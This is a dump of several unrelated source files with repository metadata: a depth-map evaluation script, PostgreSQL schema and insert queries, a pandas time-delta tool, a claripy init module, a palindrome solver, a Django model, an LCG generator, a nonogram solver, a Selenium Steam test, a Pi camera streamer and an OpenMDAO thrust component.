# CLI usage: error_single.py <model-name> <c|p> <image-path> <depth-map-path>
modelName = sys.argv[1]
modelType = sys.argv[2]  # 'c' = CycleGAN ("../CGmodel"), 'p' = Pix2Pix ("../P2Pmodel")
imagePath = sys.argv[3]
depthMap = sys.argv[4]

# Both the RGB image and the ground-truth depth are forced to 256x256.
image = cv2.resize(cv2.imread(imagePath),(256,256), interpolation=cv2.INTER_CUBIC)
depth = cv2.resize(cv2.imread(depthMap),(256,256), interpolation=cv2.INTER_CUBIC)
# NOTE(review): reshape(1,3,256,256) reinterprets OpenCV's HWC layout as
# NCHW without a transpose — presumably the models were trained with the
# same convention; confirm before reusing this snippet elsewhere.
image = torch.from_numpy(np.array(image).reshape(1,3,256,256)).float()
depth = torch.from_numpy(np.array(depth).reshape(1,3,256,256)).float()

# Pick the generator network out of the saved model object.
if modelType == 'c' :
    model = torch.load("../CGmodel/"+modelName)
    gen = model.G_XtoY
elif modelType == 'p' :
    model = torch.load("../P2Pmodel/"+modelName)
    gen = model.G
else:
    print("Choose a model type from 'c/p'")
    exit(1)

# Inference only: freeze the generator's parameters before the forward pass.
set_requires_grad(gen,False)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
image = normalization(image).to(device)
pred_depth = gen.to(device).forward(image)
depth = normalization(depth).to(device)
# Side effect: dumps the (denormalized) ground-truth depth for inspection.
cv2.imwrite("testDepth.jpg", np.array(denormalize(depth).cpu().detach()).reshape(256,256,3))
pred_depth = denormalize(pred_depth,flag=1)
depth = denormalize(depth,flag=1)
# dice=dice_coeff(pred_depth,depth)
# Report standard monocular-depth error metrics (see utils for definitions).
rel_dif = ab_rel_diff(pred_depth,depth)
sq_rel_dif = sq_rel_diff(pred_depth,depth)
rms = rms_linear(pred_depth,depth)
# print("Dice Coefficient is : ", dice)
print("Absolute Relative Difference is : ", rel_dif)
print("Square Relative Difference is : ", sq_rel_dif)
print("RMS Difference is : ", rms)
|
[
"yashkhem1@gmail.com"
] |
yashkhem1@gmail.com
|
c2ae54754ea651fb4d0e578fe907000e3bf0da28
|
f1efbd5d8039e95809ad8d313bd1a9c96d51cbf9
|
/sql_queries.py
|
0bbbb3f48c5d256f37eb83270cec170d4660c9b2
|
[] |
no_license
|
WittmannF/data-engineering-projects-postgres
|
48a7c889133c6d17af825ef4ce1d59e5b6b41e50
|
5b3200c8977d6162d56f40247e8390d028c0ad8c
|
refs/heads/main
| 2023-02-15T18:11:39.796621
| 2021-01-05T21:44:14
| 2021-01-05T21:44:14
| 326,008,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,191
|
py
|
# DROP TABLES
songplay_table_drop = "DROP TABLE IF EXISTS songplays;"
user_table_drop = "DROP TABLE IF EXISTS users;"
song_table_drop = "DROP TABLE IF EXISTS songs;"
artist_table_drop = "DROP TABLE IF EXISTS artists;"
time_table_drop = "DROP TABLE IF EXISTS time;"
# CREATE TABLES
songplay_table_create = ("""
CREATE TABLE songplays (
songplay_id SERIAL PRIMARY KEY,
start_time BIGINT NOT NULL,
user_id INT,
level VARCHAR,
song_id VARCHAR,
artist_id VARCHAR,
session_id INT,
location VARCHAR,
user_agent VARCHAR
);
""")
user_table_create = ("""
CREATE TABLE users (
user_id INT PRIMARY KEY,
first_name VARCHAR,
last_name VARCHAR,
gender VARCHAR,
level VARCHAR
);
""")
song_table_create = ("""
CREATE TABLE songs (
song_id VARCHAR PRIMARY KEY,
title VARCHAR,
artist_id VARCHAR NOT NULL,
year INT,
duration FLOAT
);
""")
artist_table_create = ("""
CREATE TABLE artists (
artist_id VARCHAR PRIMARY KEY,
name VARCHAR,
location VARCHAR,
latitude FLOAT,
longitude FLOAT
);
""")
time_table_create = ("""
CREATE TABLE time (
start_time BIGINT PRIMARY KEY,
hour INT,
day INT,
week INT,
month INT,
year INT,
weekday INT
);
""")
# INSERT RECORDS
songplay_table_insert = ("""
INSERT INTO songplays (
start_time,
user_id,
level,
song_id,
artist_id,
session_id,
location,
user_agent)
VALUES ( %s, %s, %s, %s, %s, %s, %s, %s);
""")
user_table_insert = ("""
INSERT INTO users (
user_id,
first_name,
last_name,
gender,
level)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (user_id)
DO UPDATE SET level = EXCLUDED.level;
""")
song_table_insert = ("""
INSERT INTO songs (
song_id,
title,
artist_id,
year,
duration)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (song_id)
DO NOTHING;
""")
artist_table_insert = ("""
INSERT INTO artists (
artist_id,
name,
location,
latitude,
longitude)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (artist_id)
DO NOTHING;
""")
time_table_insert = ("""
INSERT INTO time (
start_time,
hour,
day,
week,
month,
year,
weekday)
VALUES (%s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (start_time)
DO NOTHING;
""")
# FIND SONGS
song_select = ("""
SELECT songs.song_id, artists.artist_id
FROM songs INNER JOIN artists ON (songs.artist_id = artists.artist_id)
WHERE songs.title = %s AND artists.name = %s AND songs.duration = %s
;
""")
# QUERY LISTS
create_table_queries = [
songplay_table_create,
user_table_create,
song_table_create,
artist_table_create,
time_table_create
]
drop_table_queries = [
songplay_table_drop,
user_table_drop,
song_table_drop,
artist_table_drop,
time_table_drop
]
|
[
"fernando.wittmann@gmail.com"
] |
fernando.wittmann@gmail.com
|
4c87054e4f6b517be8dae9e5d95da62f3c6a37aa
|
47884bb53ffb293ccfff5e4c808915e00f6cc0d3
|
/archive/timeDelta.py
|
d80a440ffeeba2400e92fbacc59bb5a9a95990b1
|
[] |
no_license
|
andyschultz/Scripts
|
f0b75b537b825fa7ff89efec63299e2a697790f7
|
7d3b57e292ce8f48ac40553a51c052bbc1c975f8
|
refs/heads/master
| 2021-01-13T01:29:40.853048
| 2015-04-30T17:17:08
| 2015-04-30T17:17:08
| 26,029,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 583
|
py
|
#!/usr/local/bin/python3
import pandas as pd, numpy as np,sys
file = sys.argv[1]
def buildDelta(file):
df = pd.read_csv(file,sep="\t",index_col=False,skiprows=1)
df.iloc[:,0]= pd.to_datetime(df.iloc[:,0])
df.insert(1,"Cumulative Time","NaN")
df["Cumulative Time"] = (df.iloc[:,0]-df.iloc[:,0].shift()).fillna(0)
df["Cumulative Time"] = df["Cumulative Time"].cumsum(axis=0)
df["Cumulative Time"] = df["Cumulative Time"] / np.timedelta64(1,'h')
df.to_csv(file.rstrip(".txt")+"-delta.txt",index=False,sep="\t")
buildDelta(file)
|
[
"andy.schultz1@gmail.com"
] |
andy.schultz1@gmail.com
|
0da90c73bc71313602b59d4b1cce999930cd4017
|
637669abf38aa06d786458bcb552d0d5dc188302
|
/claripy/ast/__init__.py
|
2da826a5b43d467502f3d34eadb856d283ede3f4
|
[
"BSD-2-Clause"
] |
permissive
|
angr/claripy
|
c5603b52f829a9b29630ed6665ab7ec294cb8157
|
b35449fecd129dc46a0cabdd6499354e89b38a68
|
refs/heads/master
| 2023-09-05T18:48:19.736126
| 2023-09-05T17:17:45
| 2023-09-05T17:17:45
| 40,328,505
| 260
| 115
|
BSD-2-Clause
| 2023-09-11T22:09:06
| 2015-08-06T21:50:19
|
Python
|
UTF-8
|
Python
| false
| false
| 1,376
|
py
|
# pylint:disable=redefined-outer-name
from typing import TYPE_CHECKING

# Mypy is severely confused by this delayed import trickery, but works if we just pretend that the import
# happens here already
if TYPE_CHECKING:
    from .bits import Bits
    from .bv import BV
    from .vs import VS
    from .fp import FP
    from .bool import Bool, true, false
    from .int import Int
    from .base import Base
    from .strings import String
    from .. import ops as all_operations
else:
    # At runtime the real classes cannot be imported yet (circular-import
    # ordering), so every public name starts life as a do-nothing
    # placeholder that _import() later replaces.
    Bits = lambda *args, **kwargs: None
    BV = lambda *args, **kwargs: None
    VS = lambda *args, **kwargs: None
    FP = lambda *args, **kwargs: None
    Bool = lambda *args, **kwargs: None
    Int = lambda *args, **kwargs: None
    Base = lambda *args, **kwargs: None
    true = lambda *args, **kwargs: None
    false = lambda *args, **kwargs: None
    String = lambda *args, **kwargs: None
    all_operations = None

def _import():
    """Swap the placeholder lambdas for the real classes.

    Must be called once the submodules are importable; rebinds this
    module's globals in place (names already imported *from* this module
    before the call still point at the placeholders).
    """
    global Bits, BV, VS, FP, Bool, Int, Base, String, true, false, all_operations
    from .bits import Bits
    from .bv import BV
    from .vs import VS
    from .fp import FP
    from .bool import Bool, true, false
    from .int import Int
    from .base import Base
    from .strings import String
    from .. import ops as all_operations

__all__ = ("Bits", "BV", "VS", "FP", "Bool", "true", "false", "Int", "Base", "String", "all_operations")
|
[
"noreply@github.com"
] |
noreply@github.com
|
4770757cc653f027b500d6f75168f8318a702d86
|
7f2612e5132e1583e5ba9758f299a8f301f0dc70
|
/FB/5-longest-palindromic-substring.py
|
fb44ee0f8a6db9b0e87b7abf9cf4a48bd884a73a
|
[] |
no_license
|
taeheechoi/coding-practice
|
380e263a26ed4de9e542c51e3baa54315127ae4f
|
9528b5e85b0ea2960c994ffea62b5be86481dc38
|
refs/heads/main
| 2022-07-09T11:22:18.619712
| 2022-06-28T14:55:51
| 2022-06-28T14:55:51
| 447,082,854
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 426
|
py
|
class Solution:
    """Longest palindromic substring via center expansion.

    Time O(N^2), space O(1) (excluding the returned slice).
    """

    def longestPalindrome(self, s):
        """Return the longest palindromic substring of `s`."""
        best = ""
        for center in range(len(s)):
            # Try both an odd-length (single center) and an even-length
            # (two-cell center) palindrome around this index; argument
            # order matters for tie-breaking in max().
            best = max(self.is_pal(s, center, center),
                       self.is_pal(s, center, center + 1),
                       best, key=len)
        return best

    def is_pal(self, s, l, r):
        """Expand outward from s[l..r] while the window stays a palindrome."""
        while l >= 0 and r < len(s) and s[l] == s[r]:
            l -= 1
            r += 1
        return s[l + 1: r]
|
[
"dadac76@hotmail.com"
] |
dadac76@hotmail.com
|
593c5efa70cba81b2a1c8e74a4bd3a4e8bf6c73c
|
1bf512659c750eba27896ad5d1a5ad61fe08c0e4
|
/musicrest/apps/api/models.py
|
79348bd25ffd3e745eb1e479628b244e86f1bfc0
|
[] |
no_license
|
jeremyhilado/python-django-mini-project
|
fc80976e8576aa1eab9269521131107936bf8502
|
492e301e80266f1a44ba8ba3e5649af4992c836e
|
refs/heads/master
| 2023-08-17T19:43:03.052514
| 2020-06-06T18:13:33
| 2020-06-06T18:13:33
| 261,493,243
| 0
| 0
| null | 2021-09-22T18:58:26
| 2020-05-05T14:22:20
|
Python
|
UTF-8
|
Python
| false
| false
| 535
|
py
|
from django.db import models
from apps.authentication.models import User
# Create your models here.
class Artist(models.Model):
    """A music artist record owned by a single user.

    Deleting the owning User cascades to their artists. `is_public`
    presumably controls visibility to other users — confirm against the
    API views that filter on it.
    """
    name = models.CharField(max_length=255)
    genre = models.CharField(max_length=255)
    biography = models.TextField(blank=True)  # optional free-form text
    created_at = models.DateTimeField(auto_now_add=True)  # set once on insert
    updated_at = models.DateTimeField(auto_now=True)  # refreshed on every save
    owner = models.ForeignKey(User, on_delete=models.CASCADE)
    is_public = models.BooleanField(default=True)

    def __str__(self):
        # Human-readable representation (admin, shell, logs).
        return self.name
|
[
"jhilado89@gmail.com"
] |
jhilado89@gmail.com
|
d3b5e095fa1dab8e9c98895fa11a48312d856b56
|
874f46f4510b321ec3110ac8d5d5e572175c5544
|
/Generator_Tests/TestFrec/scripts/generator.py
|
94df7463f40e16990b3f6614572ff87accc2eb5a
|
[] |
no_license
|
JordiEspinozaMendoza/Simulacion
|
bb271aee0908693ff0e36470dae98216096d9066
|
fac1cdf5010a34a853a8b13d93209bcbde616e64
|
refs/heads/main
| 2023-05-31T14:06:21.329271
| 2021-06-14T02:52:06
| 2021-06-14T02:52:06
| 367,148,203
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,014
|
py
|
import sys
import os
import pandas as pd
# Recursivo() below recurses once per generated row; raise CPython's
# default recursion limit (1000) so longer periods don't blow the stack.
sys.setrecursionlimit(5000)
# Linear congruential generator parameters:
# X = seed
# a = multiplier
# c = additive constant
# m = modulus
def Operacion(X, a, c, m):
    """One linear-congruential step: (a*X + c) mod m."""
    return ((a * X) + c) % m


def createDataFrame(data):
    """Build the results table; return (rendered text, DataFrame, column names)."""
    df = pd.DataFrame(data, columns=["n", "Xn", "Xn+1", "Rn"])
    cols = list(df.columns)
    return df.to_string(), df, cols


def Recursivo(self, X0, a, c, m, conta, Detener, ArraySemilla, data):
    """Run the LCG recursively, appending one row per step to `data`.

    Stops once a value repeats (cycle detected) or after 325 rows.
    `ArraySemilla` (previously seen values) and `data` (column lists
    keyed "n"/"Xn"/"Xn+1"/"Rn") are mutated in place.

    NOTE(review): `self` is unused — this looks like a method pasted to
    module level; the parameter is kept so existing callers still work.
    """
    try:
        for Semilla in ArraySemilla:
            if X0 == Semilla:
                Detener = True  # value seen before: full period reached
        if Detener == True or conta == 325:
            pass  # 325 caps the table size
        else:
            # Hoisted: the next value was previously computed three times.
            nxt = Operacion(X0, a, c, m)
            data["n"].append(conta + 1)
            data["Xn"].append(X0)
            data["Xn+1"].append(nxt)
            data["Rn"].append(nxt / m)
            conta = conta + 1
            ArraySemilla.append(X0)
            # Bug fix: the recursive call dropped `self`, shifting every
            # argument one position left and raising a TypeError (silently
            # printed by the except below) after the first row.
            Recursivo(self, nxt, a, c, m, conta, Detener, ArraySemilla, data)
    except Exception as e:
        # Broad catch: any error (incl. RecursionError) is printed, not raised.
        print(str(e))
|
[
"jordi8101@gmail.com"
] |
jordi8101@gmail.com
|
64cba2c2b0ca9bb48817b6596678847d35379587
|
2428f771974183f86dd76a5ab9621097bba85d4e
|
/solve.py
|
28c74e44d34b35b2770e55b9d057a465143ad34e
|
[] |
no_license
|
Oripy/nonogram-solver
|
3bdcffd282e49b117a10e475b65734e6ae23fa09
|
d81b79caac04f8666bc39cba2a8fe95e592ab9e3
|
refs/heads/master
| 2021-01-15T16:00:47.186485
| 2011-07-18T08:40:48
| 2011-07-18T08:40:48
| 3,313,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,922
|
py
|
#!/usr/bin/env python
import sys
import string
import copy
import types
from data_diff import data_diff
def get_permutations(counts, length):
    """
    Return every placement of the runs `counts` in a row of `length` cells.

    Each permutation is a list of booleans (True = filled). Runs keep their
    order and are separated by at least one empty cell.

    >>> get_permutations([], 1)
    [[False]]
    >>> get_permutations([1], 1)
    [[True]]
    >>> get_permutations([2], 3)
    [[True, True, False], [False, True, True]]
    >>> get_permutations([2], 4)
    [[True, True, False, False], [False, True, True, False], [False, False, True, True]]
    >>> get_permutations([1, 1], 4)
    [[True, False, True, False], [True, False, False, True], [False, True, False, True]]
    >>> get_permutations([1, 2], 5)
    [[True, False, True, True, False], [True, False, False, True, True], [False, True, False, True, True]]
    >>> get_permutations([1, 1, 2], 7)
    [[True, False, True, False, True, True, False], [True, False, True, False, False, True, True], [True, False, False, True, False, True, True], [False, True, False, True, False, True, True]]
    """
    # Base case: no runs left -> one all-empty row.
    if len(counts) == 0:
        row = []
        for x in range(length):  # range (not xrange) keeps this Py2/Py3 portable
            row.append(False)
        return [row]
    permutations = []
    # Slide the first run across every legal start position...
    for start in range(length - counts[0] + 1):
        permutation = []
        for x in range(start):
            permutation.append(False)
        for x in range(start, start + counts[0]):
            permutation.append(True)
        x = start + counts[0]
        # ...followed by one gap cell, unless the run touches the right edge.
        if x < length:
            permutation.append(False)
            x += 1
        # NOTE(review): len(counts) == 0 cannot hold here (handled above),
        # so this branch looks dead; kept for fidelity.
        if x == length and len(counts) == 0:
            permutations.append(permutation)
            break
        sub_start = x
        # Recurse for the remaining runs in the remaining cells.
        sub_rows = get_permutations(counts[1:len(counts)], length - sub_start)
        for sub_row in sub_rows:
            sub_permutation = copy.deepcopy(permutation)
            for x in range(sub_start, length):
                sub_permutation.append(sub_row[x-sub_start])
            permutations.append(sub_permutation)
    return permutations
def solve_row(counts, row):
    """
    Return `row` with every cell fixed to the value that *all* placements
    of `counts` consistent with the known cells agree on (None otherwise).

    >>> solve_row([], [None])
    [False]
    >>> solve_row([1], [None])
    [True]
    >>> solve_row([2], [False, None, None])
    [False, True, True]
    >>> solve_row([2], [True, None, None])
    [True, True, False]
    >>> solve_row([2], [None, None, None])
    [None, True, None]
    >>> solve_row([2], [None, False, None, None])
    [False, False, True, True]
    >>> solve_row([2], [None, False, None, None, None, None])
    [False, False, None, None, None, None]

    row already completed:
    >>> solve_row([1], [None, True, None])
    [False, True, False]

    too far away to be able to complete
    >>> solve_row([2], [None, True, None, None])
    [None, True, None, False]

    assume positions of all except one count
    >>> solve_row([1, 2], [None, None, None, None, None])
    [None, None, None, True, None]
    >>> solve_row([1, 1, 1, 2], [None, None, None, None, None, None, None, None, None])
    [None, None, None, None, None, None, None, True, None]
    >>> solve_row([1, 7], [None, False, True, None, None, None, None, None, None, None])
    [True, False, True, True, True, True, True, True, True, False]

    doesn't fit on one size of False
    >>> solve_row([1, 1], [None, False, None, None])
    [True, False, None, None]

    doesn't fit on one size of False
    >>> solve_row([1, 2], [None, None, False, None, None, None])
    [None, None, False, None, True, None]

    already started on one side of False
    >>> solve_row([4], [None, None, None, None, False, None, True, None, None, None])
    [False, False, False, False, False, None, True, True, True, None]
    """
    permutations = get_permutations(counts, len(row))
    # Keep only placements consistent with cells already known.
    valid_permutations = []
    for permutation in permutations:
        valid = True
        for x in range(len(row)):  # range (not xrange) keeps this Py2/Py3 portable
            if row[x] != None and row[x] != permutation[x]:
                valid = False
        if valid:
            valid_permutations.append(permutation)
    # NOTE(review): IndexError here if no placement survives — i.e. the
    # clues contradict the known cells; callers assume solvable input.
    new_row = copy.deepcopy(valid_permutations[0])
    # Blank out every cell on which the surviving placements disagree.
    for permutation in valid_permutations:
        for x in range(len(row)):
            if new_row[x] != permutation[x]:
                new_row[x] = None
    return new_row
def solve(row_counts, col_counts, grid):
    """Constrain columns then rows repeatedly until a full pass changes nothing.

    `grid` cells are True/False/None (unknown); the grid is mutated in
    place and also returned.
    """
    width = len(grid[0])
    height = len(grid)
    changed = True
    while changed:
        changed = False
        for x in range(width):  # range (not xrange) keeps this Py2/Py3 portable
            col = []
            for y in range(height):
                col.append(grid[y][x])
            col = solve_row(col_counts[x], col)
            for y in range(height):
                if col[y] != None and grid[y][x] != col[y]:
                    changed = True
                    grid[y][x] = col[y]
        for y in range(height):
            row = copy.deepcopy(grid[y])
            row = solve_row(row_counts[y], row)
            # Bug fix: this loop previously scanned range(1) — cell 0 only —
            # so a change elsewhere in the row never set `changed` and the
            # outer loop could stop before the grid stabilised.
            for x in range(width):
                if row[x] != None and grid[y][x] != row[x]:
                    changed = True
            grid[y] = row
    return grid
def check_solution(grid):
    """Recompute the run counts from a finished grid.

    Returns [row_counts, col_counts]; the caller compares them against
    the puzzle's clues to verify a completed solution.
    """
    row_counts = []
    col_counts = []
    for y in range(len(grid)):  # range (not xrange) keeps this Py2/Py3 portable
        row_counts.append([0])
    for x in range(len(grid[0])):
        col_counts.append([0])
    for y in range(len(grid)):
        for x in range(len(grid[0])):
            if grid[y][x] == True:
                # Extend the run currently being counted.
                row_counts[y][-1] += 1
                col_counts[x][-1] += 1
            elif grid[y][x] == False:
                # Close the open run (if any) and start a fresh slot.
                if row_counts[y][-1] != 0:
                    row_counts[y].append(0)
                if col_counts[x][-1] != 0:
                    col_counts[x].append(0)
    # Drop the trailing zero slot left by rows/columns ending in empty cells.
    for y in range(len(grid)):
        if row_counts[y][-1] == 0:
            row_counts[y].pop()
    for x in range(len(grid[0])):
        if col_counts[x][-1] == 0:
            col_counts[x].pop()
    return [row_counts, col_counts]
def solve_from_file(filename):
    """Parse a tab-separated puzzle file, solve it, and print the result.

    File layout (Python 2 script): the bottom-right region is the board
    (blank, 'T' or 'F' cells); integer clue counts occupy the rows above
    and the columns to the left of it. The board size is inferred from
    where the integers stop.
    """
    # NOTE(review): the file handle is never closed; harmless for a
    # one-shot CLI script.
    f = open(filename)
    lines = f.readlines()
    #convert into a list of lists and remove whitespace
    grid = []
    width = 0
    for line in lines:
        line = line.rstrip()
        if line:
            row = string.split(line, "\t")
            width = max(width, len(row))
            grid.append(row)
    height = len(grid)
    #convert into integers and normalize row width
    # Cells become int (clue), True/False (pre-filled board cell) or None.
    y = 0
    for row in grid:
        new_row = []
        for x in xrange(width):
            try:
                i = int(row[x])
            except IndexError:
                i = None
            except ValueError:
                if row[x] == 'T':
                    i = True
                elif row[x] == 'F':
                    i = False
                else:
                    i = None
            new_row.append(i)
        grid[y] = new_row
        y += 1
    #measure height and width of inner grid
    # Scan inward from the bottom-right corner until an integer clue is hit.
    x = width - 1
    y = height - 1
    while x >= 0:
        if type(grid[y][x]) == types.IntType:
            break
        x -= 1
    inner_width = width - x - 1
    x = width - 1
    y = height - 1
    while y >= 0:
        if type(grid[y][x]) == types.IntType:
            break
        y -= 1
    inner_height = len(grid) - y - 1
    print "board size: %dx%d" % (inner_width, inner_height)
    #ensure inner grid is valid
    # The board region may only contain blanks and T/F cells.
    for x in xrange(width - inner_width, width):
        for y in xrange(height - inner_height, height):
            if type(grid[y][x]) != types.NoneType and type(grid[y][x]) != types.BooleanType:
                print 'invalid board'
                exit()
    #ensure upper left is empty
    for x in xrange(width - inner_width):
        for y in xrange(height - inner_height):
            if grid[y][x] != None:
                print 'invalid board'
                exit()
    counts_width = width - inner_width
    counts_height = height - inner_height
    #populate row counts
    row_counts = []
    for y in xrange(counts_height, height):
        counts = []
        for x in xrange(counts_width):
            count = grid[y][x]
            if count:
                counts.append(count)
        row_counts.append(counts)
    #populate column counts
    col_counts = []
    for x in xrange(counts_width, width):
        counts = []
        for y in xrange(counts_height):
            count = grid[y][x]
            if count:
                counts.append(count)
        col_counts.append(counts)
    #redo grid
    # Slice out just the board region and solve it.
    width = inner_width
    height = inner_height
    inner_grid = []
    for y in xrange(height):
        inner_grid.append([])
        for x in xrange(width):
            inner_grid[y].append(grid[y+counts_height][x+counts_width])
    grid = solve(row_counts, col_counts, inner_grid)
    complete = True
    for row in grid:
        for item in row:
            if item == None:
                complete = False
    if complete:
        # Cross-check a fully-determined grid against the original clues.
        l = check_solution(grid)
        if data_diff(l[0], row_counts) or data_diff(l[1], col_counts):
            print 'FAIL!'
            exit()
    # Pretty-print: column clues above, row clues to the left, then the
    # board (T/F/blank) — all tab separated, mirroring the input format.
    for y in xrange(counts_height):
        for x in xrange(counts_width):
            sys.stdout.write("\t")
        for counts in col_counts:
            try:
                sys.stdout.write(str(counts[-counts_height+y]))
            except:
                pass
            sys.stdout.write("\t")
        print
    y = 0
    for row in grid:
        for x in xrange(counts_width):
            try:
                sys.stdout.write(str(row_counts[y][-counts_width+x]))
            except:
                pass
            sys.stdout.write("\t")
        for square in row:
            if square == True:
                sys.stdout.write('T')
            elif square == False:
                sys.stdout.write('F')
            sys.stdout.write("\t")
        print
        y += 1
if __name__ == "__main__":
    # With a filename argument, solve that puzzle; otherwise run the
    # doctests embedded in get_permutations()/solve_row().
    if len(sys.argv) > 1:
        solve_from_file(sys.argv[1])
    else:
        import doctest
        doctest.testmod()
|
[
"repalviglator@yahoo.com"
] |
repalviglator@yahoo.com
|
5d8cfdb679b337f26330b1c109a88a1680180caf
|
d569476dd95496339c34b231621ff1f5dfd7fe49
|
/PyTest/SteamSender/tests/test_send_cards.py
|
996577a1586476bfeec33e7f74f1ba41cfd2b17e
|
[] |
no_license
|
monteua/Tests
|
10f21f9bae027ce1763c73e2ea7edaf436140eae
|
553e5f644466683046ea180422727ccb37967b98
|
refs/heads/master
| 2021-01-23T10:28:49.654273
| 2018-05-09T09:11:30
| 2018-05-09T09:11:30
| 93,061,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 494
|
py
|
from PageObject.SteamActions import SteamHome
from accounts import accounts
accounts_list = accounts()
def test_send_trade(driver):
    """Walk every configured account through login, trade offer, and logout."""
    for login in accounts_list:
        # NOTE(review): credentials are blanked in the repo — both branches
        # currently yield the empty string.
        password = "" if login == 'monte_ua13' else ""
        # Each step builds a fresh SteamHome page object, mirroring the
        # original flow exactly.
        SteamHome(driver).open_browser()
        SteamHome(driver).enter_credentials(login, password)
        SteamHome(driver).pass_steam_guard()
        SteamHome(driver).open_trade_url()
        SteamHome(driver).log_off()
|
[
"arximed.monte@gmail.com"
] |
arximed.monte@gmail.com
|
e886796a357ded12e7a87bd69fcd9177507e8a8b
|
348d736636ddc3490df1b47fafbe26d10124148e
|
/camera_pi.py
|
d502e24cc78b9b0ae47ee12cd1dd097b5bc64041
|
[] |
no_license
|
HensonZl/hackrfpibot
|
2636fbf19627913ddc754f5acc89d866612cb672
|
4eb730f5add931d0d26f2ec1177994dee5417012
|
refs/heads/master
| 2020-05-18T13:11:47.446115
| 2019-05-01T21:57:28
| 2019-05-01T21:57:28
| 184,431,429
| 16
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,986
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# camera_pi.py
#
# NOT MY SCRIPT this was used from https://www.hackster.io/ruchir1674/video-streaming-on-flask-server-using-rpi-ef3d75
# Look at the above link to get the documentation for the following script.
import time
import io
import threading
import picamera
class Camera(object):
    """Shared Pi-camera frame source for streaming clients.

    All state lives on the class, not on instances: one background thread
    continuously captures JPEG frames into `Camera.frame`, and stops
    itself after 10 seconds without any client calling get_frame().
    """
    thread = None  # background thread that reads frames from camera
    frame = None  # current frame is stored here by background thread
    last_access = 0  # time of last client access to the camera

    def initialize(self):
        """Start the capture thread if needed; block until a frame exists."""
        if Camera.thread is None:
            # start background frame thread
            Camera.thread = threading.Thread(target=self._thread)
            Camera.thread.start()

            # wait until frames start to be available
            # (sleep(0) yields the GIL so the capture thread can run)
            while self.frame is None:
                time.sleep(0)

    def get_frame(self):
        """Return the latest JPEG frame, refreshing the keep-alive timestamp."""
        Camera.last_access = time.time()
        self.initialize()
        return self.frame

    @classmethod
    def _thread(cls):
        """Capture loop: stream JPEGs into cls.frame until clients go idle."""
        with picamera.PiCamera() as camera:
            # camera setup
            camera.resolution = (320, 240)
            camera.hflip = True
            camera.vflip = True

            # let camera warm up
            camera.start_preview()
            time.sleep(2)

            stream = io.BytesIO()
            for foo in camera.capture_continuous(stream, 'jpeg',
                                                 use_video_port=True):
                # store frame
                stream.seek(0)
                cls.frame = stream.read()

                # reset stream for next frame
                stream.seek(0)
                stream.truncate()

                # if there hasn't been any clients asking for frames in
                # the last 10 seconds stop the thread
                if time.time() - cls.last_access > 10:
                    break
        # Allow a later get_frame() call to spawn a fresh capture thread.
        cls.thread = None
|
[
"noreply@github.com"
] |
noreply@github.com
|
f9783dda5c1663e07679d767cb045a425f767f67
|
4d5adf020161db482e24ebe353c70567bb14a1a1
|
/propulsion/thrust_force.py
|
d428164ff1452e54121c2c0d3d3b5d6b1f3b8a11
|
[] |
no_license
|
leamichel97/prop-solid
|
1403b9abd6a73fda6906dfe5de5543e59d2508ad
|
c81bf700ee07b304d550c47a5afa85e476ecb38d
|
refs/heads/master
| 2022-12-18T12:50:54.042165
| 2020-09-03T10:16:46
| 2020-09-03T10:16:46
| 253,484,751
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,781
|
py
|
# -*- coding: utf-8 -*-
"""
thrust_force.py generated by WhatsOpt 1.10.1
"""
import numpy as np
from propulsion.thrust_force_base import ThrustForceBase
class ThrustForce(ThrustForceBase):
    """An OpenMDAO component encapsulating the ThrustForce discipline."""

    def compute(self, inputs, outputs):
        """Compute thrust: F_T = zeta * (prop_m * Ve + Ae * (Pe - Pa)).

        Writes outputs['F_T'] and returns `outputs`; input shapes are
        documented in the generated comment block following this class.
        """
        if self._impl:
            # Docking mechanism: use implementation if referenced in
            # .whatsopt_dock.yml file.
            self._impl.compute(inputs, outputs)
        else:
            # Inline the WhatsOpt-generated formula without intermediates.
            outputs['F_T'] = inputs['zeta'] * (
                (inputs['prop_m'] * inputs['Ve'])
                + (inputs['Ae'] * (inputs['Pe'] - inputs['Pa']))
            )
        return outputs
# Reminder: inputs of compute()
#
# inputs['Ae'] -> shape: (1,), type: Float
# inputs['Pa'] -> shape: (1,), type: Float
# inputs['Pe'] -> shape: (1,), type: Float
# inputs['prop_m'] -> shape: (1,), type: Float
# inputs['Ve'] -> shape: (1,), type: Float
# inputs['zeta'] -> shape: (1,), type: Float
# To declare partial derivatives computation ...
#
# def setup(self):
# super(ThrustForce, self).setup()
# self.declare_partials('*', '*')
#
# def compute_partials(self, inputs, partials):
# """ Jacobian for ThrustForce """
#
# partials['F_T', 'Ae'] = np.zeros((1, 1))
# partials['F_T', 'Pa'] = np.zeros((1, 1))
# partials['F_T', 'Pe'] = np.zeros((1, 1))
# partials['F_T', 'prop_m'] = np.zeros((1, 1))
# partials['F_T', 'Ve'] = np.zeros((1, 1))
# partials['F_T', 'zeta'] = np.zeros((1, 1))
|
[
"leamichel1497@gmail.com"
] |
leamichel1497@gmail.com
|
7e595d3e782adea8924f7a1dd1432bd467b968e7
|
6ede75099fc38a682e030d70051389ea182d6cc2
|
/ともき本番/incomeexpensesapi/menu/migrations/0028_foodstuff_myrecipe_usereat.py
|
b1c52866aa49cd76e4c04d5b33843c23ec472259
|
[] |
no_license
|
hangtran93tk/team06
|
0d86e59be866d7f6bda1b6c81f725ca1f80eba0f
|
89000be20c18d3b9610c240b25c7c1944fc68d6d
|
refs/heads/master
| 2023-03-12T11:58:03.802711
| 2021-02-26T03:51:36
| 2021-02-26T03:51:36
| 279,473,813
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,149
|
py
|
